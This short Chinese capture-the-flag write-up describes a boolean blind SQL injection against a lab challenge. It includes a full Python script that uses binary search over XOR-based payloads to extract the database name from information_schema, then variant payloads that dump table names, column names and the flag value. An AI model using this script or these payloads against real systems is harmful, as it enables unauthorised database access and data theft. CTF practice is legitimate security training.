输入1^1^1:
输入1^2^1
尝试二分法盲注,脚本如下:
# -*- coding: UTF-8 -*-
import re
import requests
import string
requests.adapters.DEFAULT_RETRIES = 5
url = "http://cd440b51-9b92-4f4b-b53e-67d3055eb6f4.node3.buuoj.cn/"
flag = ''
def payload(i,j):
sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
data = {"stunum":sql}
r = requests.get(url,params=data)
# print (r.url)
if "admin" in r.text:
res = 1
else:
res = 0
return res
def exp():
global flag
for i in range(1,10000) :
print(i,':')
low = 31
high = 127
while low <= high :
mid = (low + high) // 2
res = payload(i,mid)
if res :
low = mid + 1
else :
high = mid - 1
f = int((low + high + 1)) // 2
if (f == 127 or f == 31):
break
# print (f)
flag += chr(f)
print(flag)
exp()
print('flag=',flag)
运行后得到数据库名ctf。
更改sql变量的值,查询ctf库的表名:
sql = “1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=’ctf’),%d,1))>%d)^1″%(i,j)
运行后得到表名:
更改sql变量的值,查询ctf数据库中,表flag的列名:
sql = “1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=’flag’)),%d,1))>%d)^1″%(i,j)
最后,flag在flag表的value列里:
sql = “1^(ord(substr((select(group_concat(value))from(flag)),%d,1))>%d)^1″%(i,j)
